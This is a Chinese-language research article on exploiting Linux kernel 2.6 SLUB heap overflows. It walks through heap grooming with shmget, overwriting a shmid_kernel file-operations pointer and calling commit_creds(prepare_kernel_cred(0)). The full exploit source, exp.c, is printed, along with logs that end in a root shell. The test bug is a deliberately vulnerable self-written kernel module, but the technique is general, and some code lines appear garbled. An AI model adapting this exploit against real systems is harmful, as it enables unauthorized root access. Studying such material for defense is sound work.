By wzt
最近几年关于kernel exploit的研究比较热门,常见的内核提权漏洞大致可以分为几类: 空指针引用,内核堆栈溢出,内核slab溢出,内核任意地址可写等等。空指针引用漏洞比较 容易exploit,典型的例子如sock_sendpage,udp_sendmsg。但是新内核的安全模块已经不 在允许userspace的code映射低内存了,所以NULL pointer dereference曾经一度只能dos, 不能提权。但是CVE-2010-4258这个内核任意地址可写漏洞,可以将null pointer dereference 的dos转化为提权。内核堆栈溢出相对userspace下的堆栈溢出比较好exploit。这里最难exploit 的是kernel的slab溢出。关于slab的溢出在05年的时候,UNF的qobaiashi就写过paper来阐述 slab的exploit方法。此后关于slab的溢出研究在都集中在2.4内核上,2.6下的slab溢出一 直没看到有相关的paper共享出来。
在kernel 2.6.22的时候,kernel为了改善slab的性能,引入了slub的设计。针对slub 溢出的paper一直没有被共享直到Jon Oberheide发布了一个针对CAN协议的slub溢出的exploit, 这个应该是第一个公开的在2.6kernel上利用slab溢出的exploit,在ubuntu-10.04 2.6.32 的kernel上运行成功。Jon Oberheide在他的blog上也有篇关于分析slub溢出的paper,但是 这个exploit由于利用了CAN代码上的一些优势,并没有把slub溢出的精髓体现出来。在深入 研究了这个exploit的基础上,在加上我调试2.4内核slab溢出的经验,研究了一下slub的溢 出技术,在centos 5.4 + 2.6.32环境测试成功。
为了便于调试,我自己写了一个LKM模块,给内核新增了一个系统调用,用户可以通过 api接口来调用。
--code------------------------------------------------------------------------- #define BUFFER_SIZE 80
asmlinkage long kmalloc_overflow_test(char *addr, int size) { char *buff = NULL;
buff = kmalloc(BUFFER_SIZE, GFP_KERNEL); if (!buff) { printk("kmalloc failed.\n"); return -1; } printk("[+] Got object at 0x%p\n", buff);
if (copy_from_user(buff, addr, size)) { printk("copy_from_user failed.\n"); kfree(buff); return -1; } printk("%s\n", buff);
return 0; } -------------------------------------------------------------------------------
这段代码用kmalloc分配了80字节的空间,但没有检查size的大小,用户传递一个大于 80的size值将会产生内核堆溢出。
slub大大简化了slab的数据结构,如从kmem_cache的3个关于slab的队列中去掉了完全 满的队列。每个slab的开始也没有了slab管理结构和管理空obj的kmem_bufctl_t数组。一个 采用slub管理的slab结构如下:
+-------------------------------------------+ | obj | obj | obj | ... |obj| +-------------------------------------------+
|first|second| +-------------------------------------------+ | obj | obj | obj | ... |obj| +-------------------------------------------+ |-----overflow--->|
内核提权的最终目的就是触发某个kernel bug,然后控制内核路径到userspace事先布 置好的shellcode上。因此我们的大方向是在second obj中如果有一个函数指针能被脏数据 覆盖为userspace下的shellcode,并且用户又能调用这个函数指针,那么将会完成权限提升 的任务。还有一个要处理的问题就是如何保证在有bug的代码中用kmalloc分配的obj和我们 想要覆盖的函数指针所在的obj是相邻的。因为只能两者相邻,才能用溢出的数据覆盖函数 指针。
我们先假设已经在kernel中找到了一个数据结构,正好满足了上面的需求,现在只要保 证两个obj是相邻的,就能完成指针覆盖。我们知道slab的一个特性是当一个cache中的所有 slab结构中的obj都用完的时候,内核将会重新分配一个slab,新分配的slab中的obj彼此都 是相邻的:
Kmalloc()->__kmalloc()->__do_kmalloc()->__cache_alloc()->____cache_alloc() ->cache_alloc_refill()->cache_grow()->cache_init_objs() --code------------------------------------------------------------------------- static void cache_init_objs(struct kmem_cache *cachep, struct slab *slabp, unsigned long ctor_flags) { for (i = 0; i < cachep->num; i++) { void *objp = index_to_obj(cachep, slabp, i); slab_bufctl(slabp)[i] = i + 1; } slab_bufctl(slabp)[i - 1] = BUFCTL_END; slabp->free = 0; } -------------------------------------------------------------------------------
前面在slab的结构中提到有个kmem_bufctl_t数组,里面的每个元素指向下一个空闲obj 的索引。在初始化一个新的slab时,每个kmem_bufctl_t元素都顺序的指向了与它相邻的下一 个obj,所以当内核重新分配一个slab结构时,我们从这个新的slab中分配的obj都是相邻的。
kmalloc()->slab_alloc()->__slab_alloc()->new_slab(): --code------------------------------------------------------------------------- static struct page *new_slab(struct kmem_cache *s, gfp_t flags, int node) { last = start; for_each_object(p, s, start, page->objects) { setup_object(s, page, last); set_freepointer(s, last, p); last = p; } setup_object(s, page, last); set_freepointer(s, last, NULL); } #define for_each_object(__p, __s, __addr, __objects) \ for (__p = (__addr); __p < (__addr) + (__objects) * (__s)->size;\ __p += (__s)->size) -------------------------------------------------------------------------------
--code------------------------------------------------------------------------- static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp) { *(void **)(object + s->offset) = fp; } -------------------------------------------------------------------------------
s->offset保存的是一个slab中下一个空闲的obj偏移,set_freepointer函数将一个obj 的下一个空闲指针指向了下一个obj。所以slub也满足这个特性。
现在我们只要在用户空间找到一种方法来不断消耗大小为96的slab,当现有的slab用完 的时候,新分配的slab中的obj就是连续相邻的。如何消耗slab,我们仍然可以用shmget系 统调用来处理,并且它用到的struct shmid_kernel结构中,就有我们想覆盖的函数指针!
ipc/shm.c: --code------------------------------------------------------------------------- sys_shmget->ipcget->ipcget_new->newseg: static int newseg(struct ipc_namespace *ns, struct ipc_params *params) { struct shmid_kernel *shp;
shp = ipc_rcu_alloc(sizeof(*shp)); shp->shm_file = file; } void* ipc_rcu_alloc(int size) { out = kmalloc(HDRLEN_KMALLOC + size, GFP_KERNEL); } -------------------------------------------------------------------------------
因此只要在用户空间不断调用shmget就会在内核中不断消耗大小为96的slab。示例中的 代码分配的是80个字节,它将会在96大小的slab中分配,这里还有一点需要注意:
--code------------------------------------------------------------------------- out = kmalloc(HDRLEN_KMALLOC + size, GFP_KERNEL); -------------------------------------------------------------------------------
用shmget分配的obj前段都有一个8个字节的站位空间,因此用shmget分配的shmid_kernel 结构将会如下:
| ------ 96 --------------------| ---------------96 ------------| +---------------------------------------------------------------+ | HDRLEN_KMALLOC | shmid_kernel | HDRLEN_KMALLOC | shmid_kernel | +---------------------------------------------------------------+
------------------------------------------------------------------------------- [wzt@localhost exp]$ cat /proc/slabinfo |grep kmalloc-96 kmalloc-96 922 924 96 42 1 : tunables 0 0 0 : slabdata 22 22 0 -------------------------------------------------------------------------------
922为当前活跃的obj数目,924是所有slab中obj的数目,因此我们在用户空间中可以解 析这个文件来得到当前系统中剩余的obj数目:
--code------------------------------------------------------------------------- int check_slab(char *slab_name, int *active, int *total) { FILE *fp; char buff[1024], name[64]; int active_num, total_num;
fp = fopen("/proc/slabinfo", "r"); if (!fp) { perror("fopen"); return -1; }
while (fgets(buff, 1024, fp) != NULL) { sscanf(buff, "%s %u %u", name, &active_num, &total_num); if (!strcmp(slab_name, name)) { *active = active_num; *total = total_num; return total_num - active_num; } }
return -1; } -------------------------------------------------------------------------------
现在写一段code来不断调用shmget,看看新分配的obj是不是连续的,为了调试方便, 我修改了sys_shmget的代码,加入了printk用于打印kmalloc后的地址。trigger程序的代码 片段如下:
trigger.c: --code------------------------------------------------------------------------- ... shmids = malloc(sizeof(int) * (free_num + SLAB_NUM * 3));
fprintf(stdout, "[+] smashing free slab ...\n"); for (i = 0; i < free_num + SLAB_NUM; i++) { if (!check_slab(SLAB_NAME, &active_num, &total_num)) break;
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); if (shmids[i] < 0) { perror("shmget"); return -1; } } base = i; fprintf(stdout, "[+] smashing %d total: %d active: %d free: %d\n", i, total_num, active_num, total_num - active_num);
fprintf(stdout, "[+] smashing adjacent slab ...\n"); i = base; for (; i < base + SLAB_NUM; i++) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); if (shmids[i] < 0) { perror("shmget"); return -1; } } check_slab(SLAB_NAME, &active_num, &total_num); fprintf(stdout, "[+] smashing %d total: %d active: %d free: %d\n", i, total_num, active_num, total_num - active_num); ...
[wzt@localhost exp]$ ./exp [+] mmaping kernel code at 0x41414141 ok. [+] looking for symbols... [+] found commit_creds addr at 0xc0446524. [+] found prepare_kernel_cred addr at 0xc0446710. [+] setting up exploit payload... [+] checking slab total: 840 active: 836 free: 4 [+] smashing free slab ... [+] smashing 17 total: 840 active: 840 free: 0 [+] smashing adjacent slab ... [+] smashing 117 total: 966 active: 966 free: 0 -------------------------------------------------------------------------------
------------------------------------------------------------------------------- [wzt@localhost exp]$ dmesg|tail -n 10 [+] kmalloc at 0xdf1ea120 [+] kmalloc at 0xdf1ea180 [+] kmalloc at 0xdf1ea1e0 [+] kmalloc at 0xdf1ea240 [+] kmalloc at 0xdf1ea2a0 [+] kmalloc at 0xdf1ea300 [+] kmalloc at 0xdf1ea360 [+] kmalloc at 0xdf1ea3c0 [+] kmalloc at 0xdf1ea420 [+] kmalloc at 0xdf1ea480 -------------------------------------------------------------------------------
ok,我们已经能获得一个连续的obj了,现在要利用slub的另一个特性:FIFO,先在这 些连续的obj中选取一个obj释放掉,然后马上触发有bug的代码,那么有bug的代码调用kmalloc 分配的obj地址就是刚才释放掉的那个obj,当溢出发生后,脏数据将会覆盖它相邻的下一个 obj。可以用如下代码来触发:
trigger.c: --code------------------------------------------------------------------------- ... free_idx = i - 4; fprintf(stdout, "[+] free exist shmid with idx: %d\n", free_idx); if (shmctl(shmids[free_idx], IPC_RMID, NULL) == -1) { perror("shmctl"); }
fprintf(stdout, "[+] trigger kmalloc overflow in %s\n", SLAB_NAME); memset(buff, 0x41, sizeof(buff)); kmalloc_overflow_test(buff, SLAB_SIZE + HDRLEN_KMALLOC + sizeof(shmid_kernel)); ... -------------------------------------------------------------------------------
------------------------------------------------------------------------------- [+] kmalloc at 0xd3decc00 [+] kmalloc at 0xd3decc60 [+] kmalloc at 0xd3deccc0 [+] kmalloc at 0xd3decd20 [+] kmalloc at 0xd3decd80 [-] kfree at 0xd3decc60 ............................... [+] Got object at 0xd3decc60 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -------------------------------------------------------------------------------
------------------------------------------------------------------------------- [wzt@localhost exp]$ tail /proc/sysvipc/shm 0 8192250 0 1024 3148 0 0 500 500 500 500 0 0 1293098372 1094795585 1094795585 0 500 134522884 0 500 1094795585 1094795585 0 0 4294967295 252 0 1094795585 1094795585 0 1024 3148 0 0 500 500 500 500 0 0 1293098372 0 8323326 0 1024 3148 0 0 500 500 500 500 0 0 1293098372 -------------------------------------------------------------------------------
可以看到与0xd3decc60相邻的下一个obj地址0xd3deccc0中的shmid_kernel结构已经被 覆盖了。
现在我们可以来覆盖一个函数指针了,在shmid_kernel中正好有满足我们需要的函数指 针!
kernel中处理ipc共享内存的一个数据结构struct shmid_kernel:
--code------------------------------------------------------------------------- struct shmid_kernel /* private to the kernel */ { struct kern_ipc_perm shm_perm; struct file * shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; pid_t shm_cprid; pid_t shm_lprid; struct user_struct *mlock_user; };
struct shmid_kernel { .shm_file = struct file { .f_op = struct file_operations = { .mmap = ATTACKER_ADDRESS } } } -------------------------------------------------------------------------------
--code------------------------------------------------------------------------- sys_shmat()->do_shmat(): long do_shmat(int shmid, char __user *shmaddr, int shmflg, ulong *raddr) { user_addr = do_mmap(file, addr, size, prot, flags, 0); } -------------------------------------------------------------------------------
------------------------------------------------------------------------------- [wzt@localhost exp]$ ./exp 执行后系统挂掉了, 看下dmesg信息: [+] kmalloc at 0xd31752a0 [+] kmalloc at 0xd3175300 [+] kmalloc at 0xd3175360 [+] kmalloc at 0xd31753c0 [+] kmalloc at 0xd3175420 [+] kmalloc at 0xd3175480 [+] kmalloc at 0xd31754e0 [-] kfree at 0xd31753c0 ............................... [+] Got object at 0xd31753c0 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BUG: unable to handle kernel NULL pointer dereference at (null) IP: [<c04fc352>] ipc_has_perm+0x46/0x61 *pde = 00000000 Oops: 0000 [#1] SMP last sysfs file: /sys/devices/pci0000:00/0000:00:05.0/local_cpus Modules linked in: sys ipv6 autofs4 sunrpc ip_tables ip6_tables x_tables dm_multipath video output sbs sbshc battery ac parport_pc lp parport snd_intel8x0 snd_ac97_codec ac97_bus snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device snd_pcm_oss snd_mixer_oss ide_cd_mod button cdrom snd_pcm rtc_cmos serio_raw rtc_core rtc_lib snd_timer 8139too floppy snd 8139cp soundcore i2c_piix4 mii snd_page_alloc i2c_core pcspkr dm_snapshot dm_zero dm_mirror dm_region_hash dm_log dm_mod ata_piix libata sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd [last unloaded: microcode]
Pid: 3190, comm: exp Not tainted (2.6.32 #2) Bochs EIP: 0060:[<c04fc352>] EFLAGS: 00010246 CPU: 1 EIP is at ipc_has_perm+0x46/0x61 EAX: 00000000 EBX: 00000000 ECX: 00000000 EDX: d3175428 ESI: 000001f0 EDI: d33ebf30 EBP: 00000080 ESP: d33ebec8 DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Process exp (pid: 3190, ti=d33eb000 task=dbe6ea30 task.ti=d33eb000) Stack: d3175428 d33ebed0 00000004 00000000 00000000 00000000 00000000 00000000 <0> 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 <0> 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 Call Trace: [<c04f9cf3>] ? security_ipc_permission+0xf/0x10 [<c04f22e4>] ? do_shmat+0xdc/0x349 [<c04057da>] ? sys_ipc+0xff/0x162 [<c0402865>] ? syscall_call+0x7/0xb Code: 8c e4 82 c0 8b 92 d8 02 00 00 89 c7 8b 52 58 8b 72 04 31 d2 89 44 24 04 89 d0 f3 ab 8b 14 24 c6 44 24 08 04 8b 42 0c 89 44 24 10 <0f> b7 0b 8d 44 24 08 8b 53 04 50 89 f0 55 e8 75 fb ff ff 83 c4 EIP: [<c04fc352>] ipc_has_perm+0x46/0x61 SS:ESP 0068:d33ebec8 CR2: 0000000000000000 ---[ end trace 7bbab7e881899412 ]--- [wzt@localhost exp]$ -------------------------------------------------------------------------------
------------------------------------------------------------------------------- [wzt@localhost exp]$ ./exp [+] mmaping kernel code at 0x41414141 ok. [+] looking for symbols... [+] found commit_creds addr at 0xc0446524. [+] found prepare_kernel_cred addr at 0xc0446710. [+] setting up exploit payload... [+] checking slab total: 798 active: 791 free: 7 [+] smashing free slab ... [+] smashing 5 total: 798 active: 798 free: 0 [+] smashing adjacent slab ... [+] smashing 105 total: 924 active: 924 free: 0 [+] free exist shmid with idx: 101 [+] trigger kmalloc overflow in kmalloc-96 [+] shmid_kernel size: 80 [+] kern_ipc_perm size: 44 [+] shmid: 3309669 [+] launching root shell! [root@localhost exp]# uname -a Linux localhost.localdomain 2.6.32 #2 SMP Thu Dec 23 14:59:36 CST 2010 i686 i686 i386 GNU/Linux [root@localhost exp]# -------------------------------------------------------------------------------
exp.c /* * linux kernel slub overflow test exploit * * by wzt <wzt.wzt@gmail.com> * */
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <limits.h> #include <inttypes.h> #include <sys/types.h> #include <sys/ipc.h> #include <sys/sem.h> #include <sys/shm.h> #include <sys/mman.h> #include <sys/stat.h>
#include "syscalls.h"
#define __NR_kmalloc_overflow_test 59
#define KALLSYMS_NAME "/proc/kallsyms" #define SLAB_NAME "kmalloc-96" #define SLAB_SIZE 96 #define SLAB_NUM 100
#define IPCMNI 32768 #define EIDRM 43 #define HDRLEN_KMALLOC 8
struct list_head { struct list_head *next; struct list_head *prev; };
struct super_block { struct list_head s_list; unsigned int s_dev; unsigned long s_blocksize; unsigned char s_blocksize_bits; unsigned char s_dirt; uint64_t s_maxbytes; void *s_type; void *s_op; void *dq_op; void *s_qcop; void *s_export_op; unsigned long s_flags; }super_block;
struct mutex { unsigned int count; unsigned int wait_lock; struct list_head wait_list; void *owner; };
struct inode { struct list_head i_hash; struct list_head i_list; struct list_head i_sb_list; struct list_head i_dentry_list; unsigned long i_ino; unsigned int i_count; unsigned int i_nlink; unsigned int i_uid; unsigned int i_gid; unsigned int i_rdev; uint64_t i_version; uint64_t i_size; unsigned int i_size_seqcount; long i_atime_tv_sec; long i_atime_tv_nsec; long i_mtime_tv_sec; long i_mtime_tv_nsec; long i_ctime_tv_sec; long i_ctime_tv_nsec; uint64_t i_blocks; unsigned int i_blkbits; unsigned short i_bytes; unsigned short i_mode; unsigned int i_lock; struct mutex i_mutex; unsigned int i_alloc_sem_activity; unsigned int i_alloc_sem_wait_lock; struct list_head i_alloc_sem_wait_list; void *i_op; void *i_fop; struct super_block *i_sb; void *i_flock; void *i_mapping; char i_data[84]; void *i_dquot_1; void *i_dquot_2; struct list_head i_devices; void *i_pipe_union; unsigned int i_generation; unsigned int i_fsnotify_mask; void *i_fsnotify_mark_entries; struct list_head inotify_watches; struct mutex inotify_mutex; }inode;
struct dentry { unsigned int d_count; unsigned int d_flags; unsigned int d_lock; int d_mounted; void *d_inode; struct list_head d_hash; void *d_parent; }dentry;
struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; void *poll; void *ioctl; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; }op;
struct vfsmount { struct list_head mnt_hash; void *mnt_parent; void *mnt_mountpoint; void *mnt_root; void *mnt_sb; struct list_head mnt_mounts; struct list_head mnt_child; int mnt_flags; const char *mnt_devname; struct list_head mnt_list; struct list_head mnt_expire; struct list_head mnt_share; struct list_head mnt_slave_list; struct list_head mnt_slave; struct vfsmount *mnt_master; struct mnt_namespace *mnt_ns; int mnt_id; int mnt_group_id; int mnt_count; }vfsmount;
struct file { struct list_head fu_list; struct vfsmount *f_vfsmnt; struct dentry *f_dentry; void *f_op; unsigned int f_lock; unsigned long f_count; }file;
struct kern_ipc_perm { unsigned int lock; int deleted; int id; unsigned int key; unsigned int uid; unsigned int gid; unsigned int cuid; unsigned int cgid; unsigned int mode; unsigned int seq; void *security; };
struct shmid_kernel { struct kern_ipc_perm shm_perm; struct file *shm_file; unsigned long shm_nattch; unsigned long shm_segsz; time_t shm_atim; time_t shm_dtim; time_t shm_ctim; unsigned int shm_cprid; unsigned int shm_lprid; void *mlock_user; }shmid_kernel;
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred;
static inline my_syscall2(long, kmalloc_overflow_test, char *, addr, int, size);
int __attribute__((regparm(3))) kernel_code(struct file *file, void *vma) { commit_creds(prepare_kernel_cred(0)); return -1; }
unsigned long find_symbol_by_proc(char *file_name, char *symbol_name) { FILE *s_fp; char buff[200]; char *p = NULL, *p1 = NULL; unsigned long addr = 0;
s_fp = fopen(file_name, "r"); if (s_fp == NULL) { printf("open %s failed.\n", file_name); return 0; }
while (fgets(buff, 200, s_fp) != NULL) { if (strstr(buff, symbol_name) != NULL) { buff[strlen(buff) - 1] = "\0"; p = strchr(strchr(buff, " ") + 1, " "); ++p;
if (!p) { return 0; } if (!strcmp(p, symbol_name)) { p1 = strchr(buff, " "); *p1 = "\0"; sscanf(buff, "%lx", &addr); //addr = strtoul(buff, NULL, 16); printf("[+] found %s addr at 0x%x.\n", symbol_name, addr); break; } } }
fclose(s_fp); return addr; }
int check_slab(char *slab_name, int *active, int *total) { FILE *fp; char buff[1024], name[64]; int active_num, total_num;
fp = fopen("/proc/slabinfo", "r"); if (!fp) { perror("fopen"); return -1; }
while (fgets(buff, 1024, fp) != NULL) { sscanf(buff, "%s %u %u", name, &active_num, &total_num); if (!strcmp(slab_name, name)) { *active = active_num; *total = total_num; return total_num - active_num; } }
return -1; }
void clear_old_shm(void) { char *cmd = "for shmid in `cat /proc/sysvipc/shm | awk "{print $2}"`; " "do ipcrm -m $shmid > /dev/null 2>&1; done;";
system(cmd); }
void mmap_init(void) { void *payload;
payload = mmap((void *)(0x41414141 & ~0xfff), 2 * 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if ((long)payload == -1) { printf("[*] Failed to mmap() at target address.\n"); return ; } printf("[+] mmaping kernel code at 0x41414141 ok.\n"); memcpy((void *)0x41414141, &kernel_code, 1024);
void setup(void) { printf("[+] looking for symbols...\n");
commit_creds = (_commit_creds) find_symbol_by_proc(KALLSYMS_NAME, "commit_creds"); if (!commit_creds) { printf("[-] not found commit_creds addr.\n"); return ; }
prepare_kernel_cred = (_prepare_kernel_cred)find_symbol_by_proc(KALLSYMS_NAME, "prepare_kernel_cred"); if (!prepare_kernel_cred) { printf("[-] not found prepare_kernel_cred addr.\n"); return ; }
printf("[+] setting up exploit payload...\n");
super_block.s_flags = 0;
inode.i_size = 4096; inode.i_sb = &super_block; inode.inotify_watches.next = &inode.inotify_watches; inode.inotify_watches.prev = &inode.inotify_watches; inode.inotify_mutex.count = 1;
dentry.d_count = 4096; dentry.d_flags = 4096; dentry.d_parent = NULL; dentry.d_inode = &inode;
op.mmap = &kernel_code; op.get_unmapped_area = &kernel_code;
vfsmount.mnt_flags = 0; vfsmount.mnt_count = 1;
file.fu_list.prev = &file.fu_list; file.fu_list.next = &file.fu_list; file.f_dentry = &dentry; file.f_vfsmnt = &vfsmount; file.f_op = &op;
shmid_kernel.shm_perm.key = IPC_PRIVATE; shmid_kernel.shm_perm.uid = 501; shmid_kernel.shm_perm.gid = 501; shmid_kernel.shm_perm.cuid = getuid(); shmid_kernel.shm_perm.cgid = getgid(); shmid_kernel.shm_perm.mode = -1; shmid_kernel.shm_file = &file; }
int trigger(void) { int *shmids; int total_num, active_num, free_num; int base, free_idx, i; int ret; char buff[1024];
free_num = check_slab(SLAB_NAME, &active_num, &total_num); fprintf(stdout, "[+] checking slab total: %d active: %d free: %d\n", total_num, active_num, total_num - active_num);
shmids = malloc(sizeof(int) * (free_num + SLAB_NUM * 3));
fprintf(stdout, "[+] smashing free slab ...\n"); for (i = 0; i < free_num + SLAB_NUM; i++) { if (!check_slab(SLAB_NAME, &active_num, &total_num)) break;
shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); if (shmids[i] < 0) { perror("shmget"); return -1; } } base = i; fprintf(stdout, "[+] smashing %d total: %d active: %d free: %d\n", i, total_num, active_num, total_num - active_num);
fprintf(stdout, "[+] smashing adjacent slab ...\n"); i = base; for (; i < base + SLAB_NUM; i++) { shmids[i] = shmget(IPC_PRIVATE, 1024, IPC_CREAT); if (shmids[i] < 0) { perror("shmget"); return -1; } } check_slab(SLAB_NAME, &active_num, &total_num); fprintf(stdout, "[+] smashing %d total: %d active: %d free: %d\n", i, total_num, active_num, total_num - active_num);
//free_idx = base + SLAB_NUM - 4; free_idx = i - 4; fprintf(stdout, "[+] free exist shmid with idx: %d\n", free_idx); if (shmctl(shmids[free_idx], IPC_RMID, NULL) == -1) { perror("shmctl"); }
fprintf(stdout, "[+] trigger kmalloc overflow in %s\n", SLAB_NAME); memset(buff, 0x41, sizeof(buff)); shmid_kernel.shm_perm.seq = shmids[free_idx + 1] / IPCMNI; memcpy(&buff[SLAB_SIZE + HDRLEN_KMALLOC], &shmid_kernel, sizeof(shmid_kernel)); //memcpy(&buff[SLAB_SIZE], &shmid_kernel, sizeof(shmid_kernel));
printf("[+] shmid_kernel size: %d\n", sizeof(shmid_kernel)); printf("[+] kern_ipc_perm size: %d\n", sizeof(struct kern_ipc_perm)); printf("[+] shmid: %d\n", shmids[free_idx]);
kmalloc_overflow_test(buff, SLAB_SIZE + HDRLEN_KMALLOC + sizeof(shmid_kernel));
ret = (int)shmat(shmids[free_idx + 1], NULL, SHM_RDONLY); if (ret == -1 && errno != EIDRM) { setresuid(0, 0, 0); setresgid(0, 0, 0);
printf("[+] launching root shell!\n");
execl("/bin/bash", "/bin/bash", NULL); exit(0); }
return 0; }
int main(void) { mmap_init(); setup(); trigger(); }
1、 Jon Oberheide - Linux Kernel CAN SLUB Overflow 2、 grip2 - Linux 内核溢出研究系列(2) - kmalloc 溢出技术 3、 qobaiashi - the sotry of exploiting kmalloc() overflows 4、 Ramon de Carvalho Valle - Linux Slab Allocator Bu_er Overow Vulnerabilities 5、 wzt - How to Exploit Linux Kernel NULL Pointer Dereference 6、 wzt - Linux kernel stack and heap exploitation